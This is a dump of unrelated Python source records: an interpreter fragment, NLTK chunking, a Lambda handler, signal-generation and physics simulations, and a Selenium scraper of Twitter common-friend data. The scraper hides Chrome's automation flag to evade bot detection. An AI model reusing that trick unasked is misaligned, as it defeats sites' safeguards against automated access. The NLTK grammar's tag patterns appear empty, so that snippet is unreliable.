return 'int'\n else:\n if pyt.startswith(\"Concaten\"): pyt = pyt[8:]\n elif pyt.startswith(\"CTN\"): pyt = pyt[3:]\n return pyt[0].lower() + re.sub(\"[A-Z]\", lambda s: \"-\" + s.lower(), pyt[1:])\n\n\nclass CTNTypeMismatch(TypeError):\n def __init__(self, expected, got):\n TypeError.__init__(self, \"Expected {} but got {}\".format(expected, got))\n self.expected_type = expected\n self.got_type = got\n\n\nSUPERTYPES = { # type => supertypes\n 'object': None,\n # Things subclassing `object` don't have to be explicitly added.\n}\n\n\ndef __type_matches(typename, comparing): # TODO Implement as Type class w/ matches() method\n \"\"\"\n typename is the typename's typename, comparing_to is the type to check if it matches. They\n difer in that if comparing_to is one of typename's superclasses, this method returns True; if\n the opposite is true, it will not look through comparing_to's superclasses.\n \"\"\"\n if typename == None: return False\n return typename == comparing or __type_matches(SUPERTYPES.get(typename, 'object'), comparing)\n\n\ndef type_match(obj, comparing_to):\n typename = __get_ctn_name(obj)\n if __type_matches(typename, comparing_to):\n return obj\n else:\n raise CTNTypeMismatch(comparing_to, typename)\n\n\nclass PyWord:\n def __init__(self, arg_types, return_types, caller, takes_word_scope=False, takes_stack=False):\n self.arg_types = arg_types\n if isinstance(return_types, str):\n self.return_types = [return_types]\n elif return_types is None:\n self.return_types = []\n else:\n self.return_types = return_types\n self.return_types.reverse()\n self.caller = caller\n self.takes_words = takes_word_scope\n self.takes_stack = takes_stack\n\n def __call__(self, stack, word_scopes):\n stack_c = copy.deepcopy(stack)\n # TODO This should be extracted to its own function so we can do cool shit like\n # ` stack` and ` optional`.\n arg_types = self.arg_types[0:]\n arg_types.reverse()\n args = [type_match(stack_c.pop(), typename) for typename in arg_types]\n del stack[-len(args):]\n passing = [args]\n if self.takes_words: passing.append(word_scopes)\n if self.takes_stack: passing.append(stack)\n res = self.caller(*passing)\n if res is not None:\n if isinstance(res, collections.Iterable) and not isinstance(res, str):\n stack.extend(res)\n else:\n stack.append(res)\n\n def __repr__(self):\n return \"builtin[{}>{}]({},{})\".format(','.join(self.arg_types),','.join(self.return_types),\n self.takes_words, self.takes_stack)\n\n\n# Because even with from __future__ import print_function, `print` still doesn't work.\n# `lambda s: print(s)` also doesn't work (**with** that import), because... reasons?\n# Why the hell is Python so inconsistent?!\ndef puts(args): print(str(args.pop()))\n#TODO: http://ruby-doc.org/core-2.3.0/IO.html#method-i-gets\ndef gets(): return input()\ndef ctn_print(args):\n sys.stdout.write(args[0])\n sys.stdout.flush()\ndef p(args):\n thing = args.pop()\n print(repr(thing))\n return thing\ndef rotate(stack, words):\n n = stack.pop()\n if not isinstance(n, numbers.Number) or isinstance(n, bool): raise CTNTypeError()\n top_n = stack[-n:]\n del stack[-n:]\n stack.extend(top_n[1:])\n stack.append(top_n[0])\ndef repeat(obj, n):\n l = round(n * len(obj))\n return (obj * math.ceil(n))[:l + 1]\ndef clear_stack(stack, __):\n del stack[:]\n\nGLOBALS = {\n 'true': lambda stack, __: stack.append(True),\n 'false': lambda stack, __: stack.append(False),\n 'null': lambda stack, __: stack.append(None),\n \n 'puts': PyWord(['object'], None, lambda args: print(str(args[0]))),\n 'gets': PyWord([], 'string', gets),\n 'print': PyWord(['object'], None, lambda args: print(repr(args[0]), end='')),\n 'p': PyWord(['object'], ['object'], lambda thing: print(thing) or thing),\n 'title': ConcatenBlock([\"\\x1b]0;\", Word('swap'), Word('+'), \"\\x07\", Word('+'), Word('puts')]),\n \n '+': [\n PyWord(['int', 'int'], 'int', lambda args: args[0] + args[1]),\n # The args for this one are reversed because it attaches the first to the end of the second\n PyWord(['string', 'string'], 'string', lambda args: args[1] + args[0]),\n ],\n '-': PyWord(['int', 'int'], 'int', lambda args: args[0] - args[1]),\n '*': [\n PyWord(['array', 'int'], 'array', lambda args: [args[0] * args[1]]), # [] prevents expansion\n PyWord(['string', 'int'], 'string', lambda args: args[0] * args[1]),\n PyWord(['array', 'float'], 'array', lambda args: [repeat(args[0], args[1])]),\n PyWord(['string', 'float'], 'string', lambda args: repeat(args[0], args[1])),\n PyWord(['int', 'int'], 'int', lambda args: args[0] * args[1]),\n PyWord(['float', 'float'], 'float', lambda args: args[0] * args[1]),\n ],\n '/': PyWord(['int', 'int'], 'int', lambda args: args[0] / args[1]),\n '^': PyWord(['int', 'int'], 'int', lambda args: args[0] ** args[1]),\n \n '==': [\n PyWord(['object', 'object'], 'bool', lambda args: args[0] == args[1]),\n ],\n \n \n 'call': PyWord(['block'], None, lambda a, words, stack: a[0](stack, words+[{}]), True, True),\n 'inline-call': PyWord(['block'], None, lambda a, words, stack: a[0](stack, words), True, True),\n \n 'dup': PyWord(['object'], ['object', 'object'], lambda args: args * 2),\n # Works because args are given in opposite order of stack (same order as args)\n 'swap': PyWord(['object', 'object'], ['object', 'object'], lambda args: args),\n 'rot': rotate,\n 'drop': PyWord(['object'], None, lambda args: None),\n 'clear-stack': lambda stack, _: stack.clear(),\n\n 'rand': [\n PyWord(['int'], None, lambda args: random.randint(0, args[0] - 1)),\n # The or is for multiple statements in a lambda.\n # Since print always returns None (falsy), the right is always interpreted\n # Note: this is valid syntax\n PyWord([], None, lambda args: random.random())\n ],\n\n 'quit': PyWord([], None, lambda args: sys.exit(0)),\n 'exit': PyWord(['int'], None, lambda args: sys.exit(args[0])),\n 'abort': [\n PyWord(['string'], None, lambda args: print(args[0]) or sys.exit(0)),\n # The or is for multiple statements in a lambda.\n # Since print always returns None (falsy), the right is always interpreted\n # Note: this is valid syntax\n PyWord([], None, lambda args: sys.exit(0))\n ]\n}\nparse(tokenize(source_func()), DATA, [GLOBALS])\n","sub_path":"concaten.py","file_name":"concaten.py","file_ext":"py","file_size_in_byte":15093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455261164","text":"#chunking\n\nfrom nltk import word_tokenize\nfrom nltk import pos_tag\nfrom nltk import ne_chunk\n\nbarack = \"Barack Hussein Obama II (born August 4, 1961) is an American politician who served as the 44th President of the\" \\\n \" United States from 2009 to 2017. A member of the Democratic Party, he was the first African American to be elected \" \\\n \"to the presidency and previously served as a United States Senator from Illinois (2005–2008)\"\n\ntokenised_barack = word_tokenize(barack)\npos_list = pos_tag(tokenised_barack)\nprint(ne_chunk(pos_list))\n\nprint(\"________________________RegexParser__________________________\")\n#regex Parser much better than default ne_chunk\n\nfrom nltk import RegexpParser\n\ngrammar = r\"\"\"Place:{+}\nDate:{<,>}\nPerson:{}\n\"\"\"\n\nregParser = RegexpParser(grammar)\nreg_lines = regParser.parse(pos_list)\nprint(reg_lines)\n","sub_path":"pos_tag.py","file_name":"pos_tag.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"323929725","text":"import json\nimport boto3\n\n\nclass ProductHandler:\n def handler(self) -> dict:\n try:\n products = self.get_products()\n\n return {\"statusCode\": 200, \"body\": json.dumps(products)}\n except Exception:\n return {\"statusCode\": 500, \"body\": \"Internal Server Error\"}\n\n def get_products(self) -> dict:\n try:\n dynamodb = boto3.resource(\"dynamodb\")\n table = dynamodb.Table(\"ProductCatalog\")\n\n response = table.scan()\n return response.get(\"Items\", False)\n\n except Exception as ex:\n print(ex)\n raise ex\n\n\ndef lambda_handler(event, context):\n productHanlder = ProductHandler()\n return productHanlder.handler()\n","sub_path":"instructions/original_lambdas/api/get_products.py","file_name":"get_products.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44069964","text":"\ndef solution(strs, t):\n \n answer = []\n queue = []\n for str in strs:\n if t.count(str) != 0 and t.find(str) == 0:\n queue.append([1, str])\n \n while len(queue):\n level, accum = queue.pop(0)\n if accum == t:\n answer.append(level)\n break\n else :\n for str in strs:\n n = len(accum)\n remain = t[n:]\n if remain.count(str) != 0 and remain.find(str) == 0:\n queue.append([level+1, accum+str])\n if len(answer):\n return min(answer)\n else:\n return -1\n \n ","sub_path":"2017_tipstown/wordpuzzle2.py","file_name":"wordpuzzle2.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231411225","text":"#!/usr/bin/env python3\nfrom const import*\n\n#---------------------------------------\nclass krl_gen(object):\n\n def __audio_callback (self,indata, outdata, frames, time, status):\n \"\"\"callback function\"\"\"\n if status:\n print(status, file=sys.stderr)\n\n#--передача-потока на аудиовыход--------------------------------------------\n t = (self.start_idx + np.arange(frames)) / (sd.default.samplerate)\n t = t.reshape(-1, 1)\n\n if self.channel == \"left\" or self.channel == \"both\":\n A_l = 1\n else:\n A_l = 0\n if self.channel == \"right\" or self.channel == \"both\":\n A_r = 1\n else:\n A_r = 0\n\n data_left = np.zeros(len(t))\n data_right = np.zeros(len(t))\n\n for i in range(len(t)):\n if self.data_in[self.num_bit] == 1:\n f_cur = self.frequency + self.krl_fdev\n else:\n f_cur = self.frequency - self.krl_fdev\n data_left[i] = (A_l * self.amplitude*np.sin(2*np.pi*f_cur*t[i]))\n data_right[i] = (A_r * self.amplitude*np.sin(2*np.pi*f_cur*t[i]))\n\n self.count_krl+= 1.0/self.fs\n if self.count_krl >= 1.0/self.krl_speed:\n self.count_krl = 0\n self.num_bit+= 1\n if self.num_bit > 7:\n self.num_bit = 0\n for j in range(7, -1, -1):\n self.data_in[j] = ((self.code & 1<>j)\n\n data_stereo = np.column_stack([data_left, data_right])\n outdata[::] = data_stereo\n self.start_idx += frames\n\n#--прием потока с микрофоного входа-------------------------------------\n self.q.put(indata[::self.downsample, self.mapping])\n\n def __init__(self):\n \"\"\"Инициализация класса\"\"\"\n self.start_idx = 0\n self.downsample = 2\n self.fs = fs\n self.channel = \"both\"\n self.data_in= np.zeros(8)\n self.frequency = 475\n self.krl_fdev = 11\n self.krl_speed = data_rate\n self.code = 0x00\n self.num_bit = 0\n self.count_krl = 0\n self.channels = [1,2]\n self.amplitude = 0.1\n self.q = queue.Queue()\n sd.default.blocksize = 0\n sd.default.samplerate = self.fs\n sd.default.channels = 2\n self.stream = sd.Stream(device = (sd.default.device, sd.default.device),\\\n callback = self.__audio_callback)\n self.mapping = [c - 1 for c in self.channels]\n for j in range(7, -1, -1):\n self.data_in[j] = ((self.code & 1<>j)\n\n","sub_path":"krl.py","file_name":"krl.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605242029","text":"import os, requests, zipfile, io\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier as cart, export_graphviz\nimport graphviz\nimport pydotplus\n\n\nif not os.path.isdir('./UCI HAR Dataset/'):\n HAR_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00240/UCI%20HAR%20Dataset.zip'\n req = requests.get(HAR_URL)\n compressed = zipfile.ZipFile(io.BytesIO(req.content))\n compressed.extractall()\n \n\ndef get_key_value_pairs(filename):\n '''Returns the key value pairs, separated by whitespaces,\n that are stored in a file.'''\n \n with open(filename, 'r') as file:\n for line in file.readlines():\n key, value = line.strip().split(' ')\n yield key, value\n\n \ndef print_accuracy(y_true, y_pred):\n print('Accuracy: {}'\n .format(np.round(accuracy_score(y_true=y_true, y_pred=y_pred, normalize=True), 4)))\n \n \ndef print_tree_graph(tree_model, features, activity, sel_feat):\n dot_data = export_graphviz(tree_model, out_file=None, \n feature_names=[features[el] for el in sel_feat], \n class_names=[activity[str(el)] for el in [1,2,3,4,5,6]]\n )\n return pydotplus.graph_from_dot_data(dot_data) \n\n\ndef compute_disjunctive_random_splits(x_sample, y_sample, splits):\n shuffled_dataset = x_sample.sample(frac=1, random_state=8)\n shuffled_splits = np.array_split(shuffled_dataset, splits)\n masks = []\n for mask in range(0, splits):\n test_x = shuffled_splits[mask]\n train_x = x_sample[x_sample.index.isin(test_x.index) == False]\n test_y = y_sample.loc[shuffled_splits[mask].index]\n train_y = y_sample.loc[train_x.index]\n #\n masks.append([train_x, test_x, train_y, test_y])\n \n return masks\n \n \n\n \nactivity = {key: value for key, value in get_key_value_pairs('./UCI HAR Dataset/activity_labels.txt')}\nfeatures = [line.strip().split(' ')[1] for line in open('./UCI HAR Dataset/features.txt', 'r')]\n\nXtrain = pd.read_table('./UCI HAR Dataset/train/X_train.txt', header=None, delim_whitespace=True, names=features)\nXtrain['subject'] = [line.strip() for line in open('./UCI HAR Dataset/train/subject_train.txt','r')]\nXtrain['activity'] = pd.read_table('./UCI HAR Dataset/train/y_train.txt', header=None, delim_whitespace=True)\n","sub_path":"cross_functions.py","file_name":"cross_functions.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266438857","text":"from TDSA import *\nfrom resolution_limit_ref_sim import sim_refs\n\n\ndeg_in = 0 # incidence angle in degrees\nsnell_sin = n_air * sin(deg_in * pi / 180)\n# n_subs = 1.17 - 0.0 * 1j # substrate refractive index -- cork\nn_subs = 1e20 - 0.0 * 1j # substrate refractive index -- metal\n\n\n# function definitions\ndef theta(n):\n return arcsin(snell_sin / real(n))\n\n\ndef ct2(n_l, n_l_1):\n n_l *= cos(theta(n_l))\n n_l_1 *= cos(theta(n_l_1))\n return 4 * n_l * n_l_1 / (n_l + n_l_1)**2\n\n\ndef cr_l_1_l(n_l, n_l_1): # from n_l-1 to n_l\n n_l_1 *= cos(theta(n_l_1))\n n_l *= cos(theta(n_l))\n return (n_l_1 - n_l) / (n_l_1 + n_l)\n\n\ndef phase_factor(n, k, thick, freq): # theta in radians\n omg = 2 * pi * freq\n thick *= cos(theta(n))\n phi = 2 * omg * thick / c_0\n return exp(- 1j * n * phi) * exp(- k * phi)\n\n\ndef epsilon(e_s, e_inf, tau, freq): # Debye model\n omg = 2 * pi * freq\n e_w = e_inf + (e_s - e_inf) / (1 + 1j * omg * tau)\n return e_w\n\n\ndef nk_from_eps(e_s, e_inf, tau, freq):\n e_w = epsilon(e_s, e_inf, tau, freq)\n n = sqrt((abs(e_w) + real(e_w)) / 2)\n k = sqrt((abs(e_w) - real(e_w)) / 2)\n return n, k\n\n\ndef H_sim(freq, n_i, k_i, thick_i, n_o, k_o, thick_o, d_air):\n \n H_i = cr_l_1_l(n_subs, n_i - 1j * k_i)\n \n rlm1l = cr_l_1_l(n_i - 1j * k_i, n_o - 1j * k_o)\n tt = ct2(n_i - 1j * k_i, n_o - 1j * k_o)\n exp_phi = phase_factor(n_i, k_i, thick_i, freq)\n \n H_i = rlm1l + (tt * H_i * exp_phi) / (1 + rlm1l * H_i * exp_phi)\n\n rlm1l = cr_l_1_l(n_o - 1j * k_o, n_air_cplx)\n tt = ct2(n_o - 1j * k_o, n_air_cplx)\n exp_phi = phase_factor(n_o, k_o, thick_o, freq)\n\n H_i = rlm1l + (tt * H_i * exp_phi) / (1 + rlm1l * H_i * exp_phi)\n \n return exp(- 1j * 2 * 2 * pi * freq * d_air / c_0) * H_i\n\n\ndef cost_function(params, *args):\n d_air, e_s_i, e_inf_i, tau_i, thick_i, e_s_o, e_inf_o, tau_o, thick_o = params\n E_sam, E_ref_w, freqs = args\n n_i, k_i = nk_from_eps(e_s_i, e_inf_i, tau_i, freqs) # debye model\n n_o, k_o = nk_from_eps(e_s_o, e_inf_o, tau_o, freqs) # debye model\n H_teo = H_sim(freqs, n_i, k_i, thick_i, n_o, k_o, thick_o, d_air)\n E_teo = irfft(H_teo * E_ref_w)\n return sum((E_sam - E_teo)**2)\n\n\ndef sim_traces(working_dir, e_s_sim_i, e_inf_sim_i, tau_sim_i,\n e_s_sim_o, e_inf_sim_o, tau_sim_o):\n t0 = time_ns()\n # out_dir = './output/traces/'\n # in_dir = './output/refs/'\n out_dir = './output/simulation_results/' + working_dir + '/traces/'\n in_dir = './output/simulation_results/' + working_dir + '/refs/'\n ref_list = os.listdir(in_dir)\n working_dir = './output/simulation_results/' + working_dir + '/'\n if not os.path.isdir(working_dir):\n os.mkdir(working_dir)\n if not os.path.isdir(out_dir):\n os.mkdir(out_dir)\n for trash_file in os.listdir(out_dir):\n os.remove(out_dir + trash_file)\n\n for ref_file in ref_list:\n t_ref, E_ref = read_1file(in_dir + ref_file) # t_ref in ps\n f_ref, E_ref_w = fourier_analysis(t_ref, E_ref) # f_ref in THz\n\n t_ref *= 1e-12 # t_ref in s\n f_ref *= 1e12 # f_ref in Hz\n\n ns_level = ref_file.split('_')[0]\n\n # material data\n # e_s_sim_i = 1.5**2\n # e_inf_sim_i = 1.7**2\n # tau_sim_i = 1e-13\n e_s_sim_i = e_s_sim_i ** 2\n e_inf_sim_i = e_inf_sim_i ** 2\n n_sim_i, k_sim_i = nk_from_eps(e_s_sim_i, e_inf_sim_i, tau_sim_i, f_ref)\n # e_s_sim_o = 1.5**2\n # e_inf_sim_o = 1.7**2\n # tau_sim_o = 1e-13\n e_s_sim_o = e_s_sim_o ** 2\n e_inf_sim_o = e_inf_sim_o ** 2\n n_sim_o, k_sim_o = nk_from_eps(e_s_sim_o, e_inf_sim_o, tau_sim_o, f_ref)\n\n f_15_idx = where(f_ref <= 1.5e12)[0][-1] # f index at 1.5 THz\n print('disp_i =', abs(n_sim_i[0] - n_sim_i[f_15_idx]) / 1.5)\n print('disp_o =', abs(n_sim_o[0] - n_sim_o[f_15_idx]) / 1.5)\n\n print('contr_im =', abs(n_sim_i[0] - n_sim_o[0]))\n\n # quit()\n\n # # internal layer\n # f_ref *= 1e-12\n # f_aux, n_aux = read_1file('./output/materials/n_Loctite_480.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Loctite_480.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_i = n_interp(f_ref)\n # k_sim_i = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # mid layer\n # f_aux, n_aux = read_1file('./output/materials/n_Loctite_3295.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Loctite_3295.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_o = n_interp(f_ref)\n # k_sim_o = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # outer layer\n # f_aux, n_aux = read_1file('./output/materials/n_Teromix_6700.csv')\n # f_aux2, alpha_aux = read_1file('./output/materials/alpha_Teromix_6700.csv')\n # n_interp = interp1d(f_aux, n_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # alpha_interp = interp1d(f_aux2, alpha_aux, bounds_error=False, fill_value=(n_aux[0], n_aux[-1]))\n # n_sim_o = n_interp(f_ref)\n # k_sim_o = alpha_interp(f_ref) * c_0 / (4 * pi * f_ref * 1e10)\n # # show()\n # # quit()\n # f_ref *= 1e12\n\n # e_s_sim_i = 1.55 ** 2\n # e_inf_sim_i = 1.55 ** 2\n # tau_sim_i = 1e-14\n # n_sim_i, k_sim_i = nk_from_eps(e_s_sim_i, e_inf_sim_i, tau_sim_i, f_ref)\n # e_s_sim_m = 1.56 ** 2\n # e_inf_sim_m = 1.56 ** 2\n # tau_sim_m = 1e-14\n # n_sim_m, k_sim_m = nk_from_eps(e_s_sim_m, e_inf_sim_m, tau_sim_m, f_ref)\n # e_s_sim_o = 1.55 ** 2\n # e_inf_sim_o = 1.55 ** 2\n # tau_sim_o = 1e-14\n # n_sim_o, k_sim_o = nk_from_eps(e_s_sim_o, e_inf_sim_o, tau_sim_o, f_ref)\n\n # material data 2.0\n # figure()\n # n_aux = ones(f_ref.size)\n # k_aux = arange(f_ref.size) / f_ref.size\n # plot(f_ref, k_aux)\n # show()\n # quit()\n\n f_min_idx, f_max_idx = f_min_max_idx(f_ref, 0, 1)\n f_ref *= 1e-12 # THz\n figure()\n plot(f_ref, n_sim_i, label='inner')\n plot(f_ref, n_sim_o, label='outer')\n xlabel(r'$f\\ (THz)$')\n # xlim([f_ref[f_min_idx], f_ref[f_max_idx]])\n # ylim([0.9 * n_sim[f_min_idx], 1.1 * n_sim[f_max_idx]])\n legend()\n savefig(working_dir + '/n_sim.png')\n close()\n\n figure()\n plot(f_ref, k_sim_i, label='inner')\n plot(f_ref, k_sim_o, label='outer')\n xlabel(r'$f\\ (THz)$')\n # xlim([f_ref[f_min_idx], f_ref[f_max_idx]])\n # ylim([k_sim[f_min_idx], k_sim[f_max_idx]])\n legend()\n savefig(working_dir + '/k_sim.png')\n # show()\n # quit()\n close()\n\n # plot(t_ref*1e12, - E_ref, label='ref')\n\n # plot(f_ref*1e12, unwrap(angle(E_ref_w)), label='ref')\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5]:\n # for d_mat in [1, 2, 3, 4, 5]:\n # for d_mat in [10, 20, 30, 40, 50]\n # for d_mat in [100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.5, 1, 5, 10, 50, 100, 500]:\n # for d_mat in [0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]:\n # for d_mat in [1e-4, 1e-3, 1e-2, 1e-1, 1, 1e2, 1e3, 1.1e3]:\n # for d_mat in [1e-4, 1e-3, 1e-2, 1e-1, 1, 1e2, 1e3]:\n # for d_mat in [1e-1, 1e-0.75, 1e-0.5, 1e-0.25, 1e0, 1e0.25, 1e0.5, 1e, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.1, 0.2, 0.3, 0.4, 0.5, 1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 100, 200, 300, 400, 500]:\n # for d_mat in [0.01, 10**-1.5, 0.1, 10**-0.5, 1, 10**0.5, 10, 10**1.5, 100, 10**2.5]:\n\n f_ref *= 1e12 # Hz\n for d_mat in pow(10, arange(-1, 3, 1 / 3)): # 1/3\n\n print()\n print('Simulating for', d_mat, 'um')\n name_trace = str(d_mat).zfill(6) + '_'\n name_trace = name_trace + str(e_s_sim_i) + '_' + str(e_inf_sim_i) + '_' + str(tau_sim_i) + '_'\n name_trace = name_trace + str(e_s_sim_o) + '_' + str(e_inf_sim_o) + '_' + str(tau_sim_o) + '_'\n name_trace = name_trace + ns_level + '.txt'\n\n d_mat *= 1e-6 # um\n\n H_sim_teo = H_sim(f_ref, n_sim_i, k_sim_i, d_mat, n_sim_o, k_sim_o, d_mat,\n 0) # - d_mat)\n # plot(f_ref, unwrap(angle(H_sim_teo)))\n # show()\n # quit()\n E_sim_w = H_sim_teo * E_ref_w\n E_sim = irfft(E_sim_w)\n # plot(t_ref*1e12, E_sim, label=round(d_mat*1e6, 1))\n # plot(f_ref, unwrap(angle(E_sim_w)), label=round(d_mat * 1e6, 1))\n\n print('Saving trace as', name_trace)\n tw = open(out_dir + name_trace, 'w')\n for i in range(E_sim.size):\n tw.write(str(t_ref[i] * 1e12) + ',' + str(E_sim[i]) + '\\n')\n tw.close()\n # legend()\n # show()\n\n\nsim_h = open('./output/sims.txt')\nfor line in sim_h:\n wk_dir, e_s_i, e_inf_i, tau_i, e_s_o, e_inf_o, tau_o = line.split(';')\n e_s_i = float(e_s_i)\n e_inf_i = float(e_inf_i)\n tau_i = float(tau_i)\n e_s_o = float(e_s_o)\n e_inf_o = float(e_inf_o)\n tau_o = float(tau_o.replace('\\n', ''))\n\n print('Simulating refs to \"measure\"', wk_dir, 'samples')\n print()\n sim_refs(wk_dir)\n print('Simulating traces - \"measuring\"', wk_dir, 'samples')\n sim_traces(wk_dir, e_s_i, e_inf_i, tau_i, e_s_o, e_inf_o, tau_o)\n print()\n print('Simulating refs to \"measure\"', wk_dir, 'references')\n sim_refs(wk_dir)\n print()\nprint('----------------------------')\nprint('Done')\nprint('----------------------------')\n","sub_path":"resolution_limit_sims_2layer.py","file_name":"resolution_limit_sims_2layer.py","file_ext":"py","file_size_in_byte":10052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174349895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : get_common_friend_by_twiangulate.py\n# @Author: Cedar\n# @Date : 2020/10/14\n# @Desc :\n\n\nfrom lxml import etree\nimport os\nimport time\nimport platform\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\ndriver = None\nold_height = 0\ncurpath = os.path.dirname(os.path.realpath(__file__))\ndriver_path = os.path.join(curpath, \"..\", \"..\", \"..\")\n\n\ndef check_height():\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n return new_height != old_height\n\n\ndef scroll(total_scrolls=5, scroll_time=10):\n global old_height\n current_scrolls = 0\n total_scrolls = int(total_scrolls)\n\n while True:\n try:\n if current_scrolls == total_scrolls:\n return\n\n old_height = driver.execute_script(\"return document.body.scrollHeight\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n WebDriverWait(driver, scroll_time, 5).until(lambda driver: check_height())\n current_scrolls += 1\n except TimeoutException:\n break\n return\n\n\ndef start_selenium(user_data_dir):\n global driver\n\n options = Options()\n # Code to disable notifications pop up of Chrome Browser\n options.add_argument(\"--disable-notifications\")\n options.add_argument(\"--disable-infobars\")\n options.add_argument(\"--mute-audio\")\n # twitter下面这个会导致登录失败\n # options.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug\n options.add_argument('blink-settings=imagesEnabled=false') # 不加载图片, 提升速度\n options.add_argument('--audio-output-channels=0')\n options.add_argument('--disable-default-apps')\n options.add_argument('--disable-extensions')\n options.add_argument('--disable-translate')\n options.add_argument('--disable-setuid-sandbox')\n options.add_argument('--disable-sync')\n # options.add_argument(\"--disable-javascript\") # 禁用JavaScript\n options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\n options.add_argument('--no-sandbox') # 以最高权限运行,解决DevToolsActivePort文件不存在的报错\n options.add_experimental_option('excludeSwitches', ['enable-automation']) # 隐藏window.navigator.webdriver\n # 取一个chrome user-data-dir目录,每个目录的Chromedriver是互相隔开的,登录不同的账号\n # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n options.add_argument(r\"user-data-dir=\" + user_data_dir)\n print(user_data_dir)\n\n # 打开chrome人工登录账号\n # google-chrome --user-data-dir=\"/home/kismanager/KIS/selenium/Twitter\"\n # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n try:\n platform_ = platform.system().lower()\n if platform_ in ['linux', 'darwin']:\n options.add_argument('--headless') # 浏览器不提供可视化页面\n chromedriver_path = os.path.join(driver_path, \"chromedriver\")\n driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)\n else:\n user_data_dir = 'E:\\\\selenium\\\\AutomationProfile1'\n options.add_argument(r\"user-data-dir=\" + user_data_dir)\n chromedriver_path = os.path.join(driver_path, \"chromedriver.exe\")\n driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)\n except Exception as e:\n print(e)\n\n driver.set_page_load_timeout(60) # 设置页面加载超时\n driver.set_script_timeout(60) # 设置页面异步js执行超时\n # driver.maximize_window()\n\n\ndef get_common_friend_by_twiangulate(url, user_data_dir):\n\n author_list = []\n try:\n start_selenium(user_data_dir)\n driver.get(url)\n time.sleep(10)\n page_source = driver.page_source\n driver.close()\n # 使用etree来xpath切割,减少报错信息\n root = etree.HTML(page_source, parser=etree.HTMLParser(encoding='utf-8'))\n items = root.xpath('//table[@id=\"result_list\"]//tr')\n for item in items:\n # 不要写item.xpath('.//a[@class=\"person_link\"]/text()')[0],有可能导致list out of index\n # author_id页面上没有\n # author_id = \"\"\n author_account = \"\".join(item.xpath('./td[2]/@data-sort'))\n author_name = \"\"\n author_url = 'https://twitter.com/' + author_account\n author_img_url = \"\".join(item.xpath('./td[2]//img/@src'))\n author_description = \"\".join(item.xpath('./td[3]//text()'))\n author_following_count = \"\".join(item.xpath('./td[4]/@data-sort'))\n author_follower_count = \"\".join(item.xpath('./td[5]/@data-sort'))\n author_message_count = \"\"\n\n author_item = {\n # \"author_id\": author_id,\n \"author_account\": author_account,\n \"author_name\": author_name,\n \"author_url\": author_url,\n \"author_img_url\": author_img_url,\n \"author_description\": author_description,\n \"author_follower_count\": author_follower_count,\n \"author_following_count\": author_following_count,\n \"author_message_count\": author_message_count,\n }\n if len(author_account) > 0:\n author_list.append(author_item)\n\n except Exception as e:\n driver.close()\n print(e)\n return str(e)\n\n return author_list\n\n\ndef main():\n url = 'http://www.twiangulate.com/search/anthonychao-David_P_Mullins/common_friends/table/my_friends-1/'\n user_data_dir = 'E:\\\\selenium\\\\AutomationProfile1'\n result = get_common_friend_by_twiangulate(url, user_data_dir)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"service_app/model/twitter/extractor/lib/get_common_friend_by_twiangulate.py","file_name":"get_common_friend_by_twiangulate.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"478033419","text":"import 